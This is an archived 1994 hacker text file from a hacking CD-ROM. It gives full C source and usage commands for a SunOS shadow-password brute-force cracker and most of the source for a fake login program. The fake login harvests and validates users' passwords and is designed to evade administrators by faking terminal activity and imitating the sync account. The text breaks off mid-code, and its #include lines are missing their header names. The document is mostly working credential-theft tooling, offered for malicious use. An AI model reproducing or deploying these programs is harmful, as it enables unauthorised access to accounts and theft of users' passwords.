home *** CD-ROM | disk | FTP | other *** search
/ Hacker's Arsenal - The Cutting Edge of Hacking / Hacker's Arsenal - The Cutting Edge of Hacking.iso / texts / misc / Unixtools.txt < prev    next >
Encoding:
Text File  |  2001-07-11  |  39.6 KB  |  1,372 lines

  1. ****************************************************************************
  2.  
  3.                     ***********************************
  4.                     * Unix Hacking Tools of the Trade *
  5.                     *                                 *
  6.                     *                By               *
  7.                     *                                 *
  8.                     *  The Shining/UPi (UK Division)  *
  9.                     ***********************************
  10.  
  11. Disclaimer :
  12.  
  13. The following text is for educational purposes only and I strongly suggest
  14. that it is not used for malicious purposes....yeah right!
  15.  
  16. Introduction :
  17.  
  18. Ok, I decided to release this phile to help out all you guys who wish to
  19. start hacking unix. Although these programs should compile & run
  20. on your system if you follow the instructions I have given, knowing a bit
  21. of C will come in handy if things go wrong. Other docs I suggest you read
  22. are older 'phrack' issues with shooting sharks various articles on unix,
  23. and of course, 'Unix from the ground up' by The Prophet.
  24.  
  25. This article includes three programs, a SUNOS Brute force Shadow password
  26. file cracker, The Ultimate Login Spoof, and a Unix Account Validator.
  27.  
  28.                                Shadow Crack
  29.                                ------------
  30.  
  31.             SUNOS Unix brute force shadow password file cracker
  32.             ---------------------------------------------------
  33.  
  34. Well, a while back, I saw an article in phrack which included a brute force
  35. password cracker for unix. This was a nice idea, except that these days
  36. more and more systems are moving towards the shadow password scheme. This,
  37. for those of you who are new to unix, involves storing the actual encrypted
  38. passwords in a different file, usually only accessible to root. A typical
  39. entry from a System V R4 password file looks like this :-
  40.  
  41. root:x:0:1:Sys. admin:/:/bin/sh
  42.  
  43. with the actual encrypted password replaced by an 'x' in the /etc/passwd
  44. file. The encrypted password is stored in a file(in the case of sysV)
  45. called /etc/shadow which has roughly the following format :-
  46.  
  47. root:XyfgFekj95Fpq:::::
  48.  
  49. this includes the login i.d., the encrypted password, and various other
  50. fields which hold info on password ageing etc...(no entry in the other
  51. fields indicate they are disabled).
  52.  
  53. Now this was fine as long as we stayed away from system V's, but now a
  54. whole load of other companies have jumped on the bandwagon from IBM (aix)
  55. to Suns SUNOS systems. The system I will be dealing with is SUNOS's
  56. shadowed system. Now, like sysV, SUNOS also have a system whereby the
  57. actual encrypted passwords are stored in a file usually called
  58. /etc/security/passwd.adjunct, and normally this is accessible only by root.
  59. This rules out the use of brute force crackers, like the one in phrack
  60. quite a while back, and also modern day programs like CRACK. A typical
  61. /etc/passwd file entry on shadowed SUNOS systems looks like this :-
  62.  
  63. root:##root:0:1:System Administrator:/:/bin/csh
  64.  
  65. with the 'shadow' password file taking roughly the same format as that of
  66. Sys V, usually with some extra fields.
  67.  
  68. However, we cannot use a program like CRACK, but SUNOS also supplied a
  69. function called pwdauth(), which basically takes two arguments, a login
  70. name and decrypted password, which is then encrypted and compared to the
  71. appropriate entry in the shadow file, thus if it matches, we have a valid
  72. i.d. & password, if not, we don't.
  73.  
  74. I therefore decided to write a program which would exploit this function,
  75. and could be used to get valid i.d's and passwords even on a shadowed
  76. system!
  77.  
  78. To my knowledge the use of the pwdauth() function is not logged, but I could
  79. be wrong. I have left it running for a while on the system I use and it has
  80. attracted no attention, and the administrator knows his shit. I have seen
  81. the functions getspwent() and getspwnam() in Sys V to manipulate the
  82. shadow password file, but not a function like pwdauth() that will actually
  83. validate the i.d. and password. If such a function does exist on other
  84. shadowed systems then this program could be very easily modified to work
  85. without problems.
  86.  
  87. The only real beef I have about this program is that because the
  88. pwdauth() function uses the standard unix crypt() function to encrypt the
  89. supplied password, it is very slow!!! Even in burst mode, a password file
  90. with 1000's of users could take a while to get through. My advice is
  91. to run it in the background and direct all its screen output to /dev/null
  92. like so :-
  93.  
  94. shcrack -mf -uroot -ddict1 > /dev/null &
  95.  
  96. Then you can log out then come back and check on it later!
  97.  
  98. The program works in a number of modes, all of which I will describe below,
  99. is command line driven, and can be used to crack both multiple accounts in
  100. the password file and single accounts specified. It is also NIS/NFS (Sun
  101. Yellow Pages) compatible.
  102.  
  103. How to use it
  104. -------------
  105.  
  106. shcrack  -m[mode]  -p[password file]  -u[user id]  -d[dictionary file]
  107.  
  108. Usage :-
  109.  
  110. -m[mode]  there are 3 modes of operation :-
  111.  
  112. -mb  Burst mode, this scans the password file, trying the minimum number
  113.      of password guessing strategies on every account.
  114.  
  115. -mi  Mini-burst mode, this also scans the password file, and tries most
  116.      password guessing strategies on every account.
  117.  
  118. -mf  Brute-force mode, tries all password strategies, including the use
  119.      of words from a dictionary, on a single account specified.
  120.  
  121. more about these modes in a sec, the other options are :-
  122.  
  123. -p[password file]  This is the password file you wish to use, if this is
  124.                    left unspecified, the default is /etc/passwd.
  125.                    NB: The program automatically detects and uses the
  126.                    password file wherever it may be in NIS/NFS systems.
  127.  
  128. -u[user id]  The login i.d. of the account you wish to crack, this is used
  129.              in Brute-force single user mode.
  130.  
  131. -d[dict file]  This uses the words in a dictionary file to generate
  132.                possible passwords for use in single user brute force
  133.                mode. If no filename is specified, the program only uses the
  134.                password guessing strategies without using the dictionary.
  135.  
  136. Modes
  137. ^^^^^
  138.  
  139. -mb  Burst mode basically gets each account from the appropriate password
  140.      file and uses two methods to guess its password. Firstly, it uses the
  141.      account name as a password, this name is then reversed and tried as a
  142.      possible password. This may seem like a weak strategy, but remember,
  143.      the users passwords are already shadowed, and therefore are deemed to
  144.      be secure. This can lead to sloppy passwords being used, and I have
  145.      came across many cases where the user has used his/her i.d. as a
  146.      password.
  147.  
  148. -mi Mini-burst mode uses a number of other password generating methods
  149.     as well as the 2 listed in burst mode. One of the methods involves
  150.     taking the login i.d. of the account being cracked, and appending the
  151.     numbers 0 to 9 to the end of it to generate possible passwords. If
  152.     this mode has no luck, it then uses the accounts gecos 'comment'
  153.     information from the password file, splitting it into words and
  154.     trying these as passwords. Each word from the comment field is also
  155.     reversed and tried as a possible password.
  156.  
  157. -mf Brute-force single user mode uses all the above techniques for password
  158.     guessing as well as using a dictionary file to provide possible
  159.     passwords to crack a single account specified. If no dictionary filename
  160.     is given, this mode operates on the single account using the
  161.     same methods as mini-burst mode, without the dictionary.
  162.  
  163. Using shadow crack
  164. ------------------
  165.  
  166. To get program help from the command line just type :-
  167.  
  168. $ shcrack
  169.  
  170. which will show you all the modes of operation.
  171.  
  172. If you wanted to crack just the account 'root', located in
  173. /etc/passwd(or elsewhere on NFS/NIS systems), using all methods
  174. including a dictionary file called 'dict1', you would do :-
  175.  
  176. $ shcrack -mf -uroot -ddict1
  177.  
  178. to do the above without using the dictionary file, do :-
  179.  
  180. $ shcrack -mf -uroot
  181.  
  182. or to do the above but in password file 'miner' do :-
  183.  
  184. $ shcrack -mf -pminer -uroot
  185.  
  186. to start cracking all accounts in /etc/passwd, using minimum password
  187. strategies do :-
  188.  
  189. $ shcrack -mb
  190.  
  191. to do the above but on a password file called 'miner' in your home
  192. directory do :-
  193.  
  194. $ shcrack -mb -pminer
  195.  
  196. to start cracking all accounts in 'miner', using all strategies except
  197. dictionary words do :-
  198.  
  199. $ shcrack -mi -pminer
  200.  
  201. ok, heres the code, ANSI C Compilers only :-
  202.  
  203. ---cut here-------------------------------------------------------------------
  204.  
  205. /* Program   : Shadow Crack
  206.    Author    : (c)1994 The Shining/UPi (UK Division)
  207.    Date      : Released 12/4/94
  208.    Unix type : SUNOS Shadowed systems only */
  209.  
  210. #include
  211. #include
  212. #include
  213. #include
  214. #include
  215.  
  216. #define WORDSIZE 20     /* Maximum word size */
  217. #define OUTFILE "data"  /* File to store cracked account info */
  218.  
  219. void word_strat( void ), do_dict( void );
  220. void add_nums( char * ), do_comment( char * );
  221. void try_word( char * ), reverse_word( char * );
  222. void find_mode( void ), burst_mode( void );
  223. void mini_burst( void ), brute_force( void );
  224. void user_info( void ), write_details( char * );
  225. void pwfile_name( void ), disable_interrupts( void ), cleanup();
  226.  
  227. char *logname, *comment, *homedir, *shell, *dict, *mode,
  228.      *pwfile, *pwdauth();
  229. struct passwd *getpwnam(), *pwentry;
  230. extern char *optarg;
  231. int option, uid, gid;
  232.  
  233. int main( int argc, char **argv )
  234. {
  235. disable_interrupts();
  236. system("clear");
  237.  
  238. if (argc < 2) {
  239. printf("Shadow Crack - (c)1994 The Shining\n");
  240. printf("SUNOS Shadow password brute force cracker\n\n");
  241. printf("useage: %s -m[mode] -p[pwfile] -u[loginid] ", argv[0]);
  242. printf("-d[dictfile]\n\n\n");
  243. printf("[b] is burst mode, scans pwfile trying minimum\n");
  244. printf("    password strategies on all i.d's\n\n");
  245. printf("[i] is mini-burst mode, scans pwfile trying both\n");
  246. printf("    userid, gecos info, and numbers to all i.d's\n\n");
  247. printf("[f] is bruteforce mode, tries all above stategies\n");
  248. printf("    as well as dictionary words\n\n");
  249. printf("[pwfile]   Uses the password file [pwfile], default\n");
  250. printf("           is /etc/passwd\n\n");
  251. printf("[loginid]  Account you wish to crack, used with\n");
  252. printf("           -mf bruteforce mode only\n\n");
  253. printf("[dictfile] uses dictionary file [dictfile] to\n");
  254. printf("           generate passwords when used with\n");
  255. printf("           -mf bruteforce mode only\n\n");
  256. exit(0);
  257. }
  258.  
  259. /* Get options from the command line and store them in different
  260.    variables */
  261.  
  262. while ((option = getopt(argc, argv, "m:p:u:d:")) != EOF)
  263.  switch(option)
  264.  {
  265.    case 'm':
  266.            mode = optarg;
  267.            break;
  268.  
  269.    case 'p':
  270.            pwfile = optarg;
  271.            break;
  272.  
  273.    case 'u':
  274.            logname = optarg;
  275.            break;
  276.  
  277.    case 'd':
  278.            dict = optarg;
  279.            break;
  280.  
  281.    default:
  282.            printf("wrong options\n");
  283.            break;
  284.  }
  285.  
  286. find_mode();
  287. }
  288.  
  289. /* Routine to redirect interrupts */
  290.  
  291. void disable_interrupts( void )
  292. {
  293. signal(SIGHUP, SIG_IGN);
  294.  signal(SIGTSTP, cleanup);
  295.   signal(SIGINT, cleanup);
  296.  signal(SIGQUIT, cleanup);
  297. signal(SIGTERM, cleanup);
  298. }
  299.  
  300. /* If CTRL-Z or CTRL-C is pressed, clean up & quit */
  301.  
  302. void cleanup( void )
  303. {
  304. FILE *fp;
  305.  
  306. if ((fp = fopen("gecos", "r")) != NULL)
  307.    remove("gecos");
  308.  
  309. if ((fp = fopen("data", "r")) == NULL)
  310.    printf("\nNo accounts cracked\n");
  311.  
  312. printf("Quitting\n");
  313. exit(0);
  314. }
  315.  
  316. /* Function to decide which mode is being used and call appropriate
  317.    routine */
  318.  
  319. void find_mode( void )
  320. {
  321.  if (strcmp(mode, "b") == NULL)
  322.     burst_mode();
  323.  else
  324.  if (strcmp(mode, "i") == NULL)
  325.     mini_burst();
  326.  else
  327.  if (strcmp(mode, "f") == NULL)
  328.     brute_force();
  329.  else
  330.   {
  331.     printf("Sorry - No such mode\n");
  332.     exit(0);
  333.   }
  334. }
  335.  
  336. /* Get a users information from the password file */
  337.  
  338. void user_info( void )
  339. {
  340.   uid = pwentry->pw_uid;
  341.    gid = pwentry->pw_gid;
  342.     comment = pwentry->pw_gecos;
  343.    homedir = pwentry->pw_dir;
  344.   shell = pwentry->pw_shell;
  345. }
  346.  
  347. /* Set the filename of the password file to be used, default is
  348.    /etc/passwd */
  349.  
  350. void pwfile_name( void )
  351. {
  352. if (pwfile != NULL)
  353.     setpwfile(pwfile);
  354. }
  355.  
  356. /* Burst mode, tries user i.d. & then reverses it as possible passwords
  357.    on every account found in the password file */
  358.  
  359. void burst_mode( void )
  360. {
  361. pwfile_name();
  362. setpwent();
  363.  
  364.   while ((pwentry = getpwent()) != (struct passwd *) NULL)
  365.   {
  366.      logname = pwentry->pw_name;
  367.       user_info();
  368.       try_word( logname );
  369.      reverse_word( logname );
  370.   }
  371.  
  372. endpwent();
  373. }
  374.  
  375. /* Mini-burst mode, try above combinations as well as other strategies
  376.    which include adding numbers to the end of the user i.d. to generate
  377.    passwords or using the comment field information in the password
  378.    file */
  379.  
  380. void mini_burst( void )
  381. {
  382. pwfile_name();
  383. setpwent();
  384.  
  385.   while ((pwentry = getpwent()) != (struct passwd *) NULL)
  386.   {
  387.      logname = pwentry->pw_name;
  388.       user_info();
  389.      word_strat();
  390.   }
  391.  
  392. endpwent();
  393. }
  394.  
  395. /* Brute force mode, uses all the above strategies as well using a
  396.    dictionary file to generate possible passwords */
  397.  
  398. void brute_force( void )
  399. {
  400. pwfile_name();
  401. setpwent();
  402.  
  403.   if ((pwentry = getpwnam(logname)) == (struct passwd *) NULL) {
  404.      printf("Sorry - User unknown\n");
  405.      exit(0);
  406.   }
  407.   else
  408.   {
  409.      user_info();
  410.       word_strat();
  411.      do_dict();
  412.   }
  413.  
  414. endpwent();
  415. }
  416.  
  417. /* Calls the various password guessing strategies */
  418.  
  419. void word_strat()
  420. {
  421.  try_word( logname );
  422.   reverse_word( logname );
  423.    add_nums( logname );
  424.   do_comment( comment );
  425. }
  426.  
  427. /* Takes the user name as its argument and then generates possible
  428.    passwords by adding the numbers 0-9 to the end. If the username
  429.    is greater than 7 characters, don't bother */
  430.  
  431. void add_nums( char *wd )
  432. {
  433. int i;
  434. char temp[2], buff[WORDSIZE];
  435.  
  436. if (strlen(wd) < 8) {
  437.  
  438.   for (i = 0; i < 10; i++)
  439.   {
  440.       strcpy(buff, wd);
  441.        sprintf(temp, "%d", i);
  442.         strcat(wd, temp);
  443.        try_word( wd );
  444.       strcpy(wd, buff);
  445.   }
  446.  
  447.  }
  448. }
  449.  
  450. /* Gets info from the 'gecos' comment field in the password file,
  451.    then process this information generating possible passwords from it */
  452.  
  453. void do_comment( char *wd )
  454. {
  455. FILE *fp;
  456.  
  457. char temp[2], buff[WORDSIZE];
  458. int c,  flag;
  459.  
  460. flag = 0;
  461.  
  462. /* Open file & store users gecos information in it. w+ mode
  463.    allows us to write to it & then read from it. */
  464.  
  465. if ((fp = fopen("gecos", "w+")) == NULL) {
  466.     printf("Error writing gecos info\n");
  467.    exit(0);
  468. }
  469.  
  470.     fprintf(fp, "%s\n", wd);
  471.    rewind(fp);
  472.  
  473. strcpy(buff, "");
  474.  
  475. /* Process users gecos information, separate words by checking for the
  476.    ',' field separater or a space. */
  477.  
  478. while ((c = fgetc(fp)) != EOF)
  479. {
  480.  
  481.  if (( c != ',' ) && ( c != ' ' )) {
  482.      sprintf(temp, "%c", c);
  483.     strncat(buff, temp, 1);
  484.  }
  485.  else
  486.     flag = 1;
  487.  
  488.    if ((isspace(c)) || (c == ',') != NULL) {
  489.  
  490.      if (flag == 1) {
  491.         c=fgetc(fp);
  492.  
  493.         if ((isspace(c)) || (iscntrl(c) == NULL))
  494.            ungetc(c, fp);
  495.      }
  496.  
  497.      try_word(buff);
  498.       reverse_word(buff);
  499.        strcpy(buff, "");
  500.       flag = 0;
  501.      strcpy(temp, "");
  502.    }
  503.  
  504. }
  505. fclose(fp);
  506. remove("gecos");
  507. }
  508.  
  509. /* Takes a string of characters as its argument(in this case the login
  510.    i.d., and then reverses it */
  511.  
  512. void reverse_word( char *wd )
  513. {
  514. char temp[2], buff[WORDSIZE];
  515. int i;
  516.  
  517. i = strlen(wd) + 1;
  518.  strcpy(temp, "");
  519. strcpy(buff, "");
  520.  
  521.  do
  522.  {
  523.     i--;
  524.     if ((isalnum(wd[i]) || (ispunct(wd[i]))) != NULL) {
  525.         sprintf(temp, "%c", wd[i]);
  526.        strncat(buff, temp, 1);
  527.     }
  528.  
  529.  } while(i != 0);
  530.  
  531. if (strlen(buff) > 1)
  532.    try_word(buff);
  533. }
  534.  
  535. /* Read one word at a time from the specified dictionary for use
  536.    as possible passwords, if dictionary filename is NULL, ignore
  537.    this operation */
  538.  
  539. void do_dict( void )
  540. {
  541. FILE *fp;
  542. char buff[WORDSIZE], temp[2];
  543. int c;
  544.  
  545. strcpy(buff, "");
  546. strcpy(temp, "");
  547.  
  548. if (dict == NULL)
  549.    exit(0);
  550.  
  551.    if ((fp = fopen(dict, "r")) == NULL) {
  552.        printf("Error opening dictionary file\n");
  553.       exit(0);
  554.    }
  555.  
  556. rewind(fp);
  557.  
  558.  while ((c = fgetc(fp)) != EOF)
  559.  {
  560.   if ((c != ' ') || (c != '\n')) {
  561.      strcpy(temp, "");
  562.       sprintf(temp, "%c", c);
  563.      strncat(buff, temp, 1);
  564.   }
  565.  
  566.   if (c == '\n') {
  567.     if (buff[0] != ' ')
  568.        try_word(buff);
  569.  
  570.       strcpy(buff, "");
  571.   }
  572.  }
  573.  
  574. fclose(fp);
  575. }
  576.  
  577. /* Process the word to be used as a password by stripping \n from
  578.    it if necessary, then use the pwdauth() function, with the login
  579.    name and word to attempt to get a valid id & password */
  580.  
  581. void try_word( char pw[] )
  582. {
  583. int pwstat, i, pwlength;
  584. char temp[2], buff[WORDSIZE];
  585.  
  586. strcpy(buff, "");
  587. pwlength = strlen(pw);
  588.  
  589. for (i = 0; i != pwlength; i++)
  590. {
  591.  
  592.  if (pw[i] != '\n') {
  593.      strcpy(temp, "");
  594.      sprintf(temp, "%c", pw[i]);
  595.     strncat(buff, temp, 1);
  596.  }
  597. }
  598.  
  599.  if (strlen(buff) > 3 ) {
  600.      printf("Trying : %s\n", buff);
  601.  
  602.      if (pwstat = pwdauth(logname, buff) == NULL) {
  603.          printf("Valid Password! - writing details to 'data'\n");
  604.  
  605.          write_details(buff);
  606.  
  607.         if (strcmp(mode, "f") == NULL)
  608.            exit(0);
  609.      }
  610.  }
  611. }
  612.  
  613. /* If valid account & password, store this, along with the accounts
  614.    uid, gid, comment, homedir & shell in a file called 'data' */
  615.  
  616. void write_details( char *pw )
  617. {
  618. FILE *fp;
  619.  
  620. if ((fp = fopen(OUTFILE, "a")) == NULL) {
  621.     printf("Error opening output file\n");
  622.    exit(0);
  623. }
  624.  
  625. fprintf(fp, "%s:%s:%d:%d:", logname, pw, uid, gid);
  626.  fprintf(fp, "%s:%s:%s\n", comment, homedir, shell);
  627. fclose(fp);
  628. }
  629.  
  630. ---cut here-------------------------------------------------------------------
  631.  
  632. again to compile it do :-
  633.  
  634. $ gcc shcrack.c -o shcrack
  635.  
  636. or
  637.  
  638. $ acc shcrack.c -o shcrack
  639.  
  640. this can vary depending on your compiler.
  641.  
  642.                          The Ultimate Login Spoof
  643.                          ^^^^^^^^^^^^^^^^^^^^^^^^
  644.  
  645. Well this subject has been covered many times before but its a while since
  646. I have seen a good one, and anyway I thought other unix spoofs have had two
  647. main problems :-
  648.  
  649. 1) They were pretty easy to detect when running
  650. 2) They recorded any only shit entered.....
  651.  
  652. Well now I feel these problems have been solved with the spoof below.
  653. Firstly, I want to say that no matter how many times spoofing is deemed as
  654. a 'lame' activity, I think it is very underestimated.
  655.  
  656. When writing this I have considered every possible feature such a program
  657. should have. The main ones are :-
  658.  
  659. 1) To validate the entered login i.d. by searching for it in the
  660.    password file.
  661.  
  662. 2) Once validated, to get all information about the account entered
  663.    including - real name etc from the comment field, homedir info
  664.    (e.g. /homedir/miner) and the shell the account is using and
  665.    store all this in a file.
  666.  
  667. 3) To keep the spoofs tty idle time to 0, thus not to arouse the
  668.    administrators suspicions.
  669.  
  670. 4) To validates passwords before storing them, on all unshadowed unix systems
  671.    & SUNOS shadowed/unshadowed systems.
  672.  
  673. 5) To emulates the 'sync' dummy account, thus making it act like the
  674.    real login program.
  675.  
  676. 6) Disable all interrupts(CTRL-Z, CTRL-D, CTRL-C), and automatically
  677.    quit if it has not grabbed an account within a specified time.
  678.  
  679. 7) To automatically detect & display the hostname before the login prompt
  680.    e.g. 'ccu login:', this feature can be disabled if desired.
  681.  
  682. 8) To run continuously until a valid i.d. & valid password are entered.
  683.  
  684. As well as the above features, I also added a few more to make the spoof
  685. 'foolproof'. At university, a lot of the users have been 'stung' by
  686. login spoofs in the past, and so have become very conscious about security.
  687.  
  688. For example, they now try and get around spoofs by entering any old crap when
  689. prompted for their login name, or to hit return a few times, to prevent any
  690. 'crappy' spoofs which may be running. This is where my spoof shines!,
  691. firstly if someone was to enter -
  692.  
  693. login: dhfhfhfhryr
  694. Password:
  695.  
  696. into the spoof, it checks to see if the login i.d. entered is
  697. valid by searching for it in the password file. If it exists, the
  698. spoof then tries to validate the password. If both the i.d. & password
  699. are valid, these will be stored in a file called .data, along with
  700. additional information about the account taken directly from the password
  701. file.
  702.  
  703. Now if, as in the case above, either the login name or password is
  704. incorrect, the information is discarded, and the login spoof runs again,
  705. waiting for a valid user i.d. & password to be entered.
  706.  
  707. Also, a lot of systems these days have an unpassworded account called
  708. 'sync', which when logged onto, usually displays the date & time the
  709. sync account was last logged into, and from which server or tty,
  710. the message of the day, syncs the disk, and then logs you straight out.
  711.  
  712. A few people have decided that the best way to dodge login spoofs is to
  713. first login to this account then when they are automatically logged out,
  714. to login to their own account.
  715.  
  716. They do this firstly, so that if a spoof is running it only records the
  717. details of the sync account and secondly the spoof would not act as the
  718. normal unix login program would, and therefore they would spot it and report
  719. it, thus landing you in the shit with the system administrator.
  720.  
  721. However, I got around this problem so that when someone
  722. tries to login as sync (or another account of a similar type, which you can
  723. define), it acts exactly like the normal login program would, right down to
  724. displaying the system date & time as well as the message of the day!!
  725.  
  726.                           The idle time facility
  727.                           ----------------------
  728.  
  729. One of the main problems with unix spoofs, is they can be spotted
  730. so easily by the administrator, as he/she could get a list of current
  731. users on the system and see that an account was logged on, and had been
  732. idle for maybe 30 minutes. They would then investigate & the spoof
  733. would be discovered.
  734.  
  735. I have therefore incorporated a scheme in the spoof whereby
  736. approx. every minute, the tty the spoof is executed from, is 'touched'
  737. with the current time, this effectively simulates terminal activity &
  738. keeps the terminals idle time to zero, which helps the spoofs chances
  739. of not being discovered greatly.
  740.  
  741. The spoof also incorporates a routine which will automatically
  742. keep track of approximately how long the spoof has been running, and if
  743. it has been running for a specified time without grabbing an i.d. or password,
  744. will automatically exit and run the real login program.
  745. This timer is by default set to 12.5 minutes, but you can alter this time
  746. if you wish.
  747.  
  748. Note: Due to the varying processing power of some systems, I could not
  749.       set the timer to exactly 60 seconds, I have therefore set it to 50,
  750.       incase it loses or gains extra time. Take this into consideration when
  751.       setting the spoofs timer to your own value. I recommend you
  752.       stick with the default, and under no circumstances let it run
  753.       for hours.
  754.  
  755.                       Password Validation techniques
  756.                       ------------------------------
  757.  
  758. The spoof basically uses 2 methods of password validation(or none at
  759. all on a shadowed system V). Firstly, when the spoof is used on any unix
  760. with an unshadowed password file, it uses the crypt function to validate a
  761. password entered. If however the system is running SUNOS 4.1.+ and
  762. incorporates the shadow password system, the program uses a function called
  763. pwdauth(). This takes the login i.d. & decrypted password as its arguments
  764. and checks to see if both are valid by encrypting the password and
  765. comparing it to the shadowed password file which is usually located in
  766. /etc/security and accessible only by root. By validating both the i.d. &
  767. password we ensure that the data which is saved to file is correct and not
  768. any old bullshit typed at the terminal!!!
  769.  
  770.                             Executing the Spoof
  771.                             -------------------
  772.  
  773. ok, now about the program. This is written in ANSI-C, so I hope you have a
  774. compatible compiler, GCC or suns ACC should do it. Now the only time you
  775. will need to change to the code is in the following circumstances :-
  776.  
  777. 1) If you are to compile & run it on an unshadowed unix,
  778.    in which case remove all references to the pwdauth() function,
  779.    from both the declarations & the shadow checking routine, add
  780.    this code in place of the shadow password checking routine :-
  781.  
  782.         if ( shadow == 1 ) {
  783.              invalid = 0;
  784.           else
  785.              invalid = 1;
  786.        }
  787.  
  788. 2) Add the above code also to the spoof if you are running this on a system
  789.    V which is shadowed. In this case the spoof loses its ability to
  790.    validate the password, to my knowledge there is no sysV equivalent
  791.    of the pwdauth() function.
  792.  
  793. Everything else should be pretty much compatible. You should have no
  794. problems compiling & running this on an unshadowed SUNOS machine, if
  795. you do, make the necessary changes as above, but it compiled ok
  796. on every unshadowed SUNOS I tested it on. The Spoof should
  797. automatically detect whether a SUNOS system is shadowed or unshadowed
  798. and run the appropriate code to deal with each situation.
  799.  
  800. Note: when you have compiled this spoof, you MUST 'exec' it from the
  801.       current shell for it to work, you must also only have one shell
  802.       running. e.g. from C or Bourne shell using the GNU C Compiler do :-
  803.  
  804. $ gcc spoof.c -o spoof
  805. $ exec spoof
  806.  
  807. This replaces the current shell with the spoof, so when the spoof quits &
  808. runs the real login program, the hackers account is effectively logged off.
  809.  
  810. ok enough of the bullshit, here's the spoof :-
  811.  
  812. ----------cut here-------------------------------------------------------
  813.  
  814. /* Program   : Unix login spoof
  815.    Author    : The Shining/UPi (UK Division)
  816.    Date      : Released 12/4/94
  817.    Unix Type : All unshadowed unix systems &
  818.                shadowed SUNOS systems
  819.    Note      : This file MUST be exec'd from the shell. */
  820.  
  821. #include
  822. #include
  823. #include
  824. #include
  825. #include
  826. #include
  827.  
  828. #define OUTFILE ".data"           /* Data file to save account info into */
  829. #define LOGPATH "/usr/bin/login"  /* Path of real login program */
  830. #define DUMMYID "sync"            /* Dummy account on your system */
  831. #define DLENGTH 4                 /* Length of dummy account name */
  832.  
  833. FILE *fp;
  834.  
  835. /* Set up variables to store system time & date */
  836.  
  837. time_t now;
  838.  
  839. static int time_out, time_on, no_message, loop_cnt;
  840.  
  841. /* Set up a structure to store users information */
  842.  
  843. struct loginfo {
  844.               char logname[10];
  845.               char key[9];
  846.               char *comment;
  847.               char *homedir;
  848.               char *shell;
  849.             } u;
  850.  
  851. /* Use the unix function getpass() to read user password and
  852.    crypt() or pwdauth()  (remove it below if not SUNOS)
  853.    to validate it etc */
  854.  
  855. char *getpass(), *gethostname(), *alarm(), *sleep(),
  856.      *crypt(), *ttyname(), *pwdauth(), motd, log_date[60],
  857.      pass[14], salt[3], *tty, cons[] = " on console ",
  858.      hname[72], *ld;
  859.  
  860. /* flag = exit status, ppid = pid shell, wait = pause length,
  861.    pwstat = holds 0 if valid password, shadow holds 1 if shadow
  862.    password system is being used, 0 otherwise. */
  863.  
  864. int flag, ppid, wait, pwstat, shadow, invalid;
  865.  
  866. /* Declare main functions */
  867.  
  868.      void write_details(struct loginfo *);
  869.      void catch( void ), disable_interrupts( void );
  870.      void log_out( void ), get_info( void ),
  871.           invalid_login( void ), prep_str( char * );
  872.  
  873. /* set up pointer to point to pwfile structure, and also
  874.    a pointer to the utime() structure */
  875.  
  876. struct passwd *pwentry, *getpwnam();
  877. struct utimbuf *times;
  878.  
  879. int main( void )
  880. {
  881. system("clear");
  882.  
  883. /* Initialise main program variables to 0, change 'loop_cnt' to 1
  884.    if you do not want the machines host name to appear with
  885.    the login prompt! (e.g. prompt is `login:` instead of
  886.    'MIT login:'  etc) */
  887.  
  888.      wait = 3;               /* Holds value for pause */
  889.       flag = 0;              /* Spoof ends if value is 1 */
  890.        loop_cnt = 0;         /* Change this to 1 if no host required */
  891.        time_out = 0;         /* Stops timer if spoof has been used */
  892.       time_on = 0;           /* Holds minutes spoof has been running */
  893.      disable_interrupts();   /* Call function to disable Interrupts */
  894.  
  895. /* Get system time & date and store in log_date, this is
  896.    displayed when someone logs in as 'sync' */
  897.  
  898.  now = time(NULL);
  899.   strftime(log_date, 60, "Last Login: %a %h %d %H:%M:%S", localtime(&now));
  900.   strcat(log_date, cons);
  901.  ld = log_date;
  902.  
  903. /* Get Hostname and tty name */
  904.  
  905. gethostname(hname, 64);
  906.  strcat(hname, " login: ");
  907. tty = ttyname();
  908.  
  909. /* main routine */
  910.  
  911.   while( flag == 0 )
  912.   {
  913.        invalid = 0;        /* Holds 1 if id +/or pw are invalid */
  914.         shadow = 0;        /* 1 if shadow scheme is in operation */
  915.          no_message = 0;   /* Flag for Login Incorrect msg */
  916.         alarm(50);         /* set timer going */
  917.        get_info();         /* get user i.d. & password */
  918.  
  919. /* Check to see if the user i.d. entered is 'sync', if it is
  920.    display system time & date, display message of the day and
  921.    then run the spoof again, insert the account of your
  922.    choice here, if its not sync, but remember to put
  923.    the length of the accounts name next to it! */
  924.  
  925.      if (strncmp(u.logname, DUMMYID, DLENGTH) == NULL) {
  926.         printf("%s\n", ld);
  927.  
  928.           if ((fp = fopen("/etc/motd", "r")) != NULL) {
  929.               while ((motd = getc(fp)) != EOF)
  930.                      putchar(motd);
  931.  
  932.               fclose(fp);
  933.           }
  934.  
  935.            printf("\n");
  936.              prep_str(u.logname);
  937.              no_message = 1;
  938.            sleep(wait);
  939.      }
  940.  
  941. /* Check if a valid user i.d. has been input, then check to see if
  942.    the password system is shadowed or unshadowed.
  943.    If both the user i.d. & password are valid, get additional info
  944.    from the password file, and store all info in a file called .data,
  945.    then exit spoof and run real login program */
  946.  
  947.     setpwent();   /* Rewind pwfile to beign processing */
  948.  
  949.     if ((pwentry = getpwnam(u.logname)) == (struct passwd *) NULL) {
  950.          invalid = 1;
  951.         flag = 0;
  952.     }
  953.     else
  954.        strncpy(salt, pwentry->pw_passwd, 2);
  955.  
  956. /* Check for shadowed password system, in SUNOS, the field in /etc/passwd
  957.    should begin with '##', in system V it could contain an 'x', if none
  958.    of these exist, it checks that the entry = 13 chars, if less then
  959.    shadow system will probably be implemented (unless acct has been
  960.    disabled) */
  961.  
  962.  if ( invalid == 0 ) {
  963.  
  964.        if ((strcmp(salt, "##")) || (strncmp(salt, "x", 1)) == NULL)
  965.            shadow = 1;
  966.        else
  967.           if (strlen(pwentry->pw_passwd) < 13)
  968.              shadow = 1;
  969.  
  970. /* If unshadowed, use the salt from the pwfile field & the key to
  971.    form the encrypted password which is checked against the entry
  972.    in the password file, if it matches, then all is well, if not,
  973.    spoof runs again!! */
  974.  
  975.     if ( shadow != 1 ) {
  976.  
  977.       if (strcmp(pwentry->pw_passwd, crypt(u.key, salt)) == NULL)
  978.          invalid = 0;
  979.       else
  980.          invalid = 1;
  981.     }
  982.  
  983. /* If SUNOS Shadowing is in operation, use the pwdauth() function
  984.    to validate the password, if not SUNOS, substitute this code
  985.    with the routine I gave earlier! */
  986.  
  987.        if ( shadow == 1 ) {
  988.           if (pwstat = pwdauth(u.logname, u.key) == NULL)
  989.              invalid = 0;
  990.           else
  991.              invalid = 1;
